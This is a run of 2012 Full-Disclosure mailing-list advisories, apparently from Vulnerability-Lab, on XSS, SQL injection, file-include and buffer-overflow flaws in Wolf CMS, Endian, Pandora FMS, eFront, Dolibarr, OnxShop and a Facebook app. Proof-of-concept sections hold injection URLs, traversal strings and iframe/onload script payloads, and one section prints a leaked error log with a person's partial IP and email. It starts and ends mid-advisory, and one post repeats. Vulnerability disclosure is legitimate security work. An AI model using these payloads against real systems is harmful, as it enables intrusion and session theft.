remote attacker or local low privileged user account to inject persistent malicious script code on application side. Successful exploitation can result in persistent context manipulation on requests, session hijacking account steal via application side phishing. Vulnerable Module(s): [+] /plugins/comment/ Picture(s): ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers local low privileged user accounts with- and without required user inter action. For demonstration or reproduce ... 1.1 Path: /wolfcms/wolf/plugins/comment/ File: index.php Review: 271: $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR']:($_SERVER['REMOTE_ADDR']); 1.2 Path: /wolfcms/wolf/plugins/comment/ File: index.php Review: /wolfcms/wolf/plugins/comment/index.php 272: echo 'input type=hidden value='.$ip.' name=comment[author_ip] /'; Risk: = 1.1 The security risk of the blind sql injection vulnerabilities are estimated as high(+). 1.2 The security risk of the persistant xss vulnerabilities are estimated as medium(+). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili M. (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Endian UTM Firewall v2.4.x - Cross Site Vulnerabilities
Title: == Endian UTM Firewall v2.4.x - Cross Site Vulnerabilities Date: = 2012-02-18 References: === http://www.vulnerability-lab.com/get_content.php?id=436 VL-ID: = 436 Introduction: = The Endian Firewall is an open source GNU/Linux distribution that specializes on Routing/Firewalling and Unified Threat Management. It is being developed by the Italian Endian Srl and the community. Endian is originally based on IPCop, which itself was a fork of Smoothwall. (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Endian_Firewall ) Einfach, schnell und zukunftssicher! Die ideale Lösung, um Ihre Filialen und industriellen Zweigstellen rund um den Globus zu schützen. Endian 4i ist die ideale Lösung für Büroaußenstellen oder Industrieinstallationen. Die Firewall ist in den zwei Varianten „Office“ und „Industrial“ erhältlich. Die Office-Version bietet alle Funktionen, um Netzwerke in der Firma und in Verbindung mit Außenstellen einfach und sicher zu verlinken. Derselbe Funktionsumfang ist bei der Industrial-Version vorhanden, die sich speziell an den Industriebereich richtet und 24V Support bietet sowie auf der Hutschiene installiert werden kann. Remote-Supporting, Remote-Konfiguration, Systemüberwachung bis hin zur einfachen, sicheren Vernetzung von Außenstellen – die Kostenvorteile dabei liegen auf der Hand. Sichern auch Sie sich die Konnektivität Ihres Unternehmens ab, und behalten Sie mit der Endian 4i stets die Nase vorn. (Copy of the Vendor Homepage: http://www.endian.com/de/products/utm-hardware/4i/) Abstract: = The Vulnerability Lab Team discovered mutliple non persistent Cross Site Scripting Vulnerabilities on Endians UTM Firewall v2.4.x Application. Report-Timeline: 2011-02-02: Vendor Notification 2012-02-18: Public or Non-Public Disclosure Status: Published Affected Products: == Endian Product: UTM Firewall Appliance Application v2.4.x Exploitation-Technique: === Remote Severity: = Medium Details: Multiple non persistent cross site scripting vulnerabilities are detected on Endian Firewall v2.4.x UTM Appliance Application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user inter action or local low privileged user account. Successful exploitation can result in account steal, phishing client-side content request manipulation. Vulnerable Module(s): [+] openvpn_users.cgi [+] dnat.cgi#createrule [+] dansguardian.cgi#addrule Picture(s): ../1.png ../2.png ../3.png Proof of Concept: = The vulnerabilities can be exploited by local low privileged user accounts or remote attackers with high required user inter action. For demonstration or reproduce ... #1 https://demo.endian.com/cgi-bin/dnat.cgi#createrule [XSS] #2 https://demo.endian.com/cgi-bin/dansguardian.cgi#addrule[XSS] #3 https://demo.endian.com/cgi-bin/openvpn_users.cgi ?=[XSS] Risk: = The security risk of the cross site scripting vulnerabilities are estimated as medium(-). Credits: Vulnerability Research Laboratory Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html
[Full-disclosure] Pandora FMS v4.0.1 - Local File Include Vulnerability
Title: == Pandora FMS v4.0.1 - Local File Include Vulnerability Date: = 2012-02-17 References: === http://www.vulnerability-lab.com/get_content.php?id=435 VL-ID: = 435 Introduction: = Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ new technology market. * Detect new systems in network. * Checks for availability or performance. * Raise alerts when something goes wrong. * Allow to get data inside systems with its own lite agents (for almost every Operating System). * Allow to get data from outside, using only network probes. Including SNMP. * Get SNMP Traps from generic network devices. * Generate real time reports and graphics. * SLA reporting. * User defined graphical views. * Store data for months, ready to be used on reporting. * Real time graphs for every module. * High availability for each component. * Scalable and modular architecture. * Supports up to 2500 modules per server. * User defined alerts. Also could be used to react on incidents. * Integrated incident manager. * Integrated DB management: purge and DB compaction. * Multiuser, multi profile, multi group. * Event system with user validation for operation in teams. * Granularity of accesses and user profiles for each group and each user. * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles. Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003. (Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=projectsec2=homelang=en) Abstract: = Vulnerability-Lab Team discovered a File Include Vulnerability on Pandoras FMS Monitoring Application v4.0.1 Report-Timeline: 2012-02-01: Vendor Notification 2012-02-17: Public or Non-Public Disclosure Status: Published Affected Products: == Pandora FMS Product: UTM Firewall Appliance Application v4.0.1 Exploitation-Technique: === Local Severity: = High Details: A local File Include vulnerability is detected on Pandoras FMS Monitoring Application Service v4.0.1. The vulnerability allows an attackers to request local system or application files (example:module). Successful exploitation can result in dbms or service/appliance/application compromise via file include vulnerability. Vulnerable Module(s): [+] ServicesSec2= Affected Version(s): [+] Pandora FMS Monitoring v4.0.1 Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerability can be exploited by remote attacker with privileged user account. For demonstration or reproduce ... http://[SERVER].[COM]/[PANDORA PATH]/[INDEX].[PHP]?sec=servicessec2=[FILE INCLUDE VULNERABILITY!] Risk: = The security risk of the local path include vulnerability is estimated as high(-). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab --- + VIDEO ;) Title: == Pandora FMS Monitoring - File Include Vulnerability VD Date: = 2012-02-17 References: === Download: http://www.vulnerability-lab.com/resources/videos/438.wmv View:
[Full-disclosure] Facebook NYClubs - Multiple Web Vulnerabilities
Title: == Facebook NYClubs - Multiple Web Vulnerabilities Date: = 2012-02-17 References: === http://www.vulnerability-lab.com/get_content.php?id=440 VL-ID: = 440 Introduction: = The application is currently included and viewable by all facebook users. The service is an external 3rd party application sponsored by the Facebook NYClubs Development Team. (Copy from the Vendors Homepage: http://apps.facebook.com/nyclubs/) Facebook is a social networking service and website launched in February 2004, operated and privately owned by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Facebook users must register before using the site. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics. (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook) Abstract: = Vulnerability-Lab researcher discovered multiple web vulnerabilities on the 3rd party web application - Facebook NYClubs (apps.facebook.com). Report-Timeline: 2012-02-15: Vendor Notification 2012-02-16: Vendor Response/Feedback 2012-02-16: Developer Notification by Facebook Security 2012-02-17: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 A remote SQL Injection Vulnerability is detected on the Facebook NYClubs application (apps.facebook). The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected fb application dbms. Successful exploitation can result in a stable application, service or dbms compromise. Vulnerable Application(s): [+] NYClubs - Facebook 3rd Party Application Vulnerable Module(s): [+] Messagebox Affected Service(s): [+] apps.facebook.com/nyclubs/ --- Exception/Error Logs --- INSERT INTO reviews (club_id, ip, name, fbid, location, email, rating, content, active, approved) VALUES (652,`121.112.203.222 ` Sven R-m,11940496405,`x014...@gmail.com`,10,`` i-(Rated 9/10) Picture(s): ../1.png 1.2 A client side Cross Site Scripting Vulnerability is detected on the Facebook NYClubs application (apps.facebook). The vulnerability allows an attacker (remote) to hijack sessions manipulate client-side application requests with high required user inter action. Vulnerable Module(s): [+] ?r=sregiond= Picture(s): ../2.png Proof of Concept: = The vulnerabilities can be exploited with without high required user inter action. For demonstration or reproduce ... 1.1 Vulnerable: [MessageBox Input] --- Include a frame to the local app website extract the error log Tables: club_id, ip, name, fbid, location, email, rating, content, active, approved IP: 121.112.203.222 NAME: Sven R-m Mail: x014...@gmail.com Limit: 10-- Type: Order by Injection Reference(s): ../652.htm 1.2 http://apps.facebook.com/nyclubs/?r=sregiond=%3Ciframe%20src=http://vulnerability-lab.com %20width=750%20height=700%3E Reference(s): ../NYClubs on Facebook.htm Risk: = The security risk of the application sql injection vulnerability is estimated as high(+). Credits: Vulnerability Research Laboratory - N/A Anonymous Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.
[Full-disclosure] Yahoo! Messenger v11.5 - Buffer Overflow Vulnerability
Title: == Yahoo! Messenger v11.5 - Buffer Overflow Vulnerability Date: = 2012-02-11 References: === http://www.vulnerability-lab.com/get_content.php?id=434 VL-ID: = 434 Introduction: = Der Yahoo Messenger (eigene Schreibung Yahoo! Messenger, kurz auch Y!M, YIM oder Yim) ist ein verbreiteter Instant-Messaging-Client, sowie ein Protokoll von Yahoo. Der Yahoo Messenger ist kostenlos und kann mit einem gültigen Yahoo-Zugang heruntergeladen und installiert werden. Die Funktionen des Yahoo Messenger sind ICQ, dem AOL Instant Messenger und dem Windows Live Messenger sehr ähnlich, sie sind zueinander aber nicht kompatibel. Allerdings haben sich Microsoft und Yahoo entschlossen, ihre IM-Dienste zusammenzuschließen. Seit Version 8 von Yahoo Messenger können zumindest Textnachrichten mit dem Windows Live Messenger ausgetauscht werden (Copy of the Vendor Homepage: http://de.wikipedia.org/wiki/Yahoo_Messenger ) Abstract: = The Vulnerability Lab Research Team discovered a Buffer Overflow Vulnerability on the Yahoo Messenger v11.5 Report-Timeline: 2012-02-10: Public or Non-Public Disclosure Status: Published Affected Products: == Yahoo! Product: Instant Messenger v11.5 Exploitation-Technique: === Local Severity: = High Details: A Buffer Overflow vulnerability is detected on Yahoos IMessenger v11.5 client software. The bug is located on the drag drop message box function of the software when processing special crafted file transfers. The vulnerability allows an local attacker to crash down(stable) the software all bound yahoo components. Vulnerable Module(s): [+] Drag Drop - Message Box Picture(s): ../1.png ../2.png Proof of Concept: = This vulnerability can be exploited by local attackers. For demonstration or reproduce ... PoC Video: http://www.vulnerability-lab.com/get_content.php?id=432 Risk: = The security risk of the local vulnerability is estimated as high(-). Credits: Vulnerability Research Laboratory- Manideep a.k.a z3r0 erRoR Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] eFront Community++ v3.6.10 - SQL Injection Vulnerability
Title: == eFront Community++ v3.6.10 - SQL Injection Vulnerability Date: = 2012-02-11 References: === http://www.vulnerability-lab.com/get_content.php?id=422 VL-ID: = 422 Introduction: = Tailored with larger organizations in mind, eFront Community ++ offers solutions for the management of companies most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Community ++ platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Community ++ builds on top of eFront Educational. (Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-Community ++.html) Abstract: = A Vulnerability Lab Researcher discovered a sql injection vulnerability on eFronts Community ++ v3.6.10 Application. Report-Timeline: 2012-02-01: Vendor Notification 2012-02-11: Public or Non-Public Disclosure Status: Published Affected Products: == eFront Product: Communiy ++ v3.6.10 Exploitation-Technique: === Remote Severity: = High Details: A remote SQL Injection vulnerability is detected on eFronts Community ++ v3.6.10 Application. The vulnerability allows an attacker (remote) to inject/execute own sql commands on the affected efront application dbms. Successful exploited by a privileged user account can result in dbms application compromise. Vulnerable Module(s): [+] Course Edit Picture(s): ../1.png Proof of Concept: = The vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: [server].com/communityplusplus/www/administrator.php?ctg=courseedit_course=-1'[SQL INJECTION!] Reference(s): [Server].[COM]/[CMS PATH]/[WWW]/[File].[PHP]?[Value]=[Value2][EDIT]=[SQL INJECTION!] Risk: = The security risk of the sql injection vulnerability is estimated as high(+). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Yahoo Messenger - Buffer Overflow Vulnerability [Video]
Title: == Yahoo Messenger - Buffer Overflow Vulnerability [Video] Date: = 2012-02-10 References: === Download: http://www.vulnerability-lab.com/resources/videos/432.wmv View: http://www.youtube.com/watch?v=cc9qc90Rz64 VL-ID: = 432 Status: Published Exploitation-Technique: === Defensiv Severity: = High Details: The video shows a live demonstration session Manideep alias z3r0 erRoR on the famous yahoo messenger. The video explain how to detect exploit a local drag + drop buffer overflow vulnerability. 1) Whenever we try to send image file on IM box of chat rooms,it gets delivered as a file to other person 2) Yahoo Messenger does not allow drag and drop files onto its chat rooms Message box 3) However we can copy and paste it there resulting in yahoo messenger crash! Credits: Vulnerability Research Laboratory- Manideep a.k.a z3r0 erRoR Disclaimer: === The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities
Title: == Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities Date: = 2012-02-07 References: === http://www.vulnerability-lab.com/get_content.php?id=428 VL-ID: = 428 Introduction: = Dolibarr ERP CRM is a modern software to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It s an opensource free software designed for small and medium companies, foundations and freelances. You can install, use and distribute it as a standalone application or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with any devices (desktop, smartphone, tablet). (Copy of the Vendor Homepage: http://www.dolibarr.org/) Abstract: = Vulnerability-Lab researcher discovered a multiple File Include Vulnerabilities on Dolibarrs CMS v3.2.0 Alpha. Report-Timeline: 2011-02-08: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: Multiple File Include Vulnerabilities are detected on Dolibarrs Content Management System v3.2.0 Alpha. The vulnerability allows an attacker (remote) or local low privileged user account to request local web-server or system files. Successful exploitation of the vulnerability results in dbms application compromise. Vulnerable Module(s): [+] ?modulepart=projectfile= [+] ?action=createactioncode=AC_RDVcontactid=1socid=1backtopage= Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... http://xxx.com/document.php?modulepart=projectfile=../[FILE INCLUDE VULNERABILITY!] http://xxx.com/comm/action/fiche.php?action=createactioncode=AC_RDVcontactid=1socid=1backtopage=../common/[FILE INCLUDE VULNERABILITY!] Risk: = The security riks of the file include vulnerabilities are estimated as high(+). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri Ucha Gobejishvili (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities
Title: == OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities Date: = 2012-02-08 References: === http://www.vulnerability-lab.com/get_content.php?id=426 VL-ID: = 426 Introduction: = Onxshop is not only great CMS offering integrated in-context editing and full design freedom without the constraints of limiting templates, but it s also stable ecommerce platform used in production environment since 2006. Flexible layout modules, which support nesting based on the Fibonacci sequence Complete HTML/CSS framework, which allows you to use the same HTML and core CSS for multiple websites with different branding and designs. Simplified MVC paradigm using Model = Storage Access (SQL and PHP), View = Presentation to client (simple HTML engine), Controller = Handling actions (request processing in PHP to produce View). To put it simply, you will not see the $align option in Model or Controller or the SQL query in Controller Flexible routing system which allows each component to be called on its own (useful for AJAX) The option to rewrite each template, model or controller specifically for a project, so developers can add their own stamp to the system. Common components that are all built directly by our core team, which means that 99% of projects don\\\'t need to install external components. This eliminates problems with incompatible components (extensions/modules/plugins) which affects some CMS software. Behavioural targeting support in the core system and many other components. An all in one system - content management system, blog, product catalogue and checkout process all rolled into one. This allows users share the same category system and media library across their product catalogue and blog articles, or include an “add to basket” button in blog posts about a product. There isn t any other web system in the universe which can do this with such ease. One fulltext search for the CMS, eCommerce and blog. Onxshop is a new kind of Content Management System (Shop|eCommerce). Onxshop is currently used by more than 50 businesses around the world, and that figure is growing all the time. (Copy of the Vendor Homepage: http://http://onxshop.com/) Abstract: = Vulnerability-Lab Team discovered multiple web vulnerabilities on Onxshops Content Management System v1.5.0 Report-Timeline: 2012-02-09: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistant input validation vulnerabilities are detected on on Onxshops Content Management System v1.5.0. The bug allows remote attacker to implement malicious script code on the application side (persistent). Successful exploitation of the vulnerability allows an attacker to manipulate modules/context (persistent) can lead to session hijacking (user/mod/admin). Vulnerable Module(s): [+] Pages - Title [+] Search - Keywords Inputs [+] Vochou Pictures: ../1.png ../2.png ../3.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers with medium required user inter action. For demonstration or reproduce ... 1. tr id=node_id_1194 tda onclick=openEdit('/popup/properties/1194/orig/page/88') href=javascript:void(1194) class=#8203;#8203;#8203;#8203;#8203;iframe a= = onload='alert(VulnerabilityLab)' src=a/td tdpage/default/td td0/td td0/td tddiv class=onxshop_page_propertiesa class=onxshop_delete title=Delete default href=#1194spanDelete/span/a/div/td/tr /tbody /table 2. div id=breadCrumb a href=/reportsReports/a span style=font-size:8px;/spanspan class=location img src=http://www.vulnerability-lab.com/gfx/partners/vlab.png; onLoad=alert(1337);/span [X] /div ...or option value=allAll Orders/option/select /span /divdiv class=row search span class=labellabelSearch query/label/span span class=field #8203;#8203;#8203;#8203;#8203;input width=800 type=text height=800 src=http://vulnerability-lab.com; iframe= value= name=order-list-filter[query] id=query/ //span/div div class=row registered_between span class=labellabelCreated between/label/span span class=field input width=800 type=text height=800 src=http://vulnerability-lab.com; iframe= value= name=order-list-filter[created_from] id=order-list-filter-created_from class=text hasDatepicker/ / input width=800 type=text height=800 src=http://vulnerability-lab.com; iframe= value= name=order-list-filter[created_to] id=order-list- filter-created_to class=text hasDatepicker/
[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities
Title: == Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities Date: = 2012-02-09 References: === http://www.vulnerability-lab.com/get_content.php?id=427 VL-ID: = 427 Introduction: = Dolibarr ERP CRM is a modern software to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It s an opensource free software designed for small and medium companies, foundations and freelances. You can install, use and distribute it as a standalone application or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with any devices (desktop, smartphone, tablet). (Copy of the Vendor Homepage: http://www.dolibarr.org/) Abstract: = Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on Dolibarrs CMS v3.2.0 Alpha. Report-Timeline: 2011-02-09: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: Multiple remote SQL Injection vulnerabilities are detected on Dolibarrs Content Management System v3.2.0 Alpha. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms application compromise. Vulnerable Module(s): [+] Member List [+] Row ID --- Error/Exception Logs --- Das System hat einen technischen Fehler festgestellt. Diese Informationen könnten bei der Diagnose des Fehlers behilflich sein: Datum: 20120209164847 Dolibarr: 3.2.0-alpha Funktions-Level: 0 PHP: 5.2.4-2ubuntu5.19 Server: Apache Angeforderte URL: /adherents/fiche.php?rowid=-1%27 Menüverwaltung: eldy_backoffice.php Datenbanktyp-Verwaltung: mysql Anfrage des letzten Datenbankzugriffs mit Fehler: SELECT d.rowid, d.civilite, d.prenom as firstname, d.nom as lastname, d.societe, d.fk_soc, d.statut, d.public, d.adresse as address, d.cp as zip, d.ville as town, d.note, d.email, d.phone, d.phone_perso, d.phone_mobile, d.login, d.pass, d.photo, d.fk_adherent_type, d.morphy, d.datec as datec, d.tms as datem, d.datefin as datefin, d.naiss as datenaiss, d.datevalid as datev, d.pays, d.fk_departement, p.rowid as country_id, p.code as country_code, p.libelle as country, dep.nom as state, dep.code_departement as state_code, t.libelle as type, t.cotisation as cotisation, u.rowid as user_id, u.login as user_login FROM llx_adherent_type as t, llx_adherent as d LEFT JOIN llx_c_pays as p ON d.pays = p.rowid LEFT JOIN llx_c_departements as dep ON d.fk_departement = dep.rowid LEFT JOIN llx_user as u ON d.rowid = u.fk_member WHERE d.fk_adherent_type = t.rowid AND d.entity = 1 AND d.rowid=-1\\\' Return-Code des letzten Datenbankzugriffs mit Fehler: DB_ERROR_SYNTAX Inhalt des letzten Datenbankzugriffs mit Fehler: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\'\\\'\\\' at line 1 Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\'\\\'\\\' at line 1 Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... 1.1 1. Login to the Panel 2. Open the list.php 3. Include the following example string - on the memberslist -%20` 1.2 http://demo.dolibarr.org/adherents/fiche.php?rowid=-1%27[SQL Injection Vulnerability!] Risk: = The security risk of the sql injection vulnerabilities are stimated as high(+). Credits: Vulnerability Research Laboratory -Benjamin Kunz MejriUcha Gobejishvili Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form
[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities
Title: == Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities Date: = 2012-02-09 References: === http://www.vulnerability-lab.com/get_content.php?id=427 VL-ID: = 427 Introduction: = Dolibarr ERP CRM is a modern software to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It s an opensource free software designed for small and medium companies, foundations and freelances. You can install, use and distribute it as a standalone application or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with any devices (desktop, smartphone, tablet). (Copy of the Vendor Homepage: http://www.dolibarr.org/) Abstract: = Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on Dolibarrs CMS v3.2.0 Alpha. Report-Timeline: 2011-02-09: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: Multiple remote SQL Injection vulnerabilities are detected on Dolibarrs Content Management System v3.2.0 Alpha. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms application compromise. Vulnerable Module(s): [+] Member List [+] Row ID --- Error/Exception Logs --- Das System hat einen technischen Fehler festgestellt. Diese Informationen könnten bei der Diagnose des Fehlers behilflich sein: Datum: 20120209164847 Dolibarr: 3.2.0-alpha Funktions-Level: 0 PHP: 5.2.4-2ubuntu5.19 Server: Apache Angeforderte URL: /adherents/fiche.php?rowid=-1%27 Menüverwaltung: eldy_backoffice.php Datenbanktyp-Verwaltung: mysql Anfrage des letzten Datenbankzugriffs mit Fehler: SELECT d.rowid, d.civilite, d.prenom as firstname, d.nom as lastname, d.societe, d.fk_soc, 